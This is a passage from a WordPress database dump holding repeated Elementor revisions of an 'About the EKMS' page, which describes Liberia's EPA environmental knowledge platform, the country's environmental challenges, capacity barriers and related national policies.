created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4> <p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000). In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar. During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals. The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030. The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017). Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs. This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12031,1955,'_elementor_edit_mode','builder'),(12032,1955,'_elementor_template_type','wp-page'),(12033,1955,'_elementor_version','2.7.5'),(12034,1955,'_wp_page_template','default'),(12035,1955,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<p>\\u00a0<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12037,1956,'_elementor_edit_mode','builder'),(12038,1956,'_elementor_template_type','wp-page'),(12039,1956,'_elementor_version','2.7.5'),(12040,1956,'_wp_page_template','default'),(12041,1956,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to 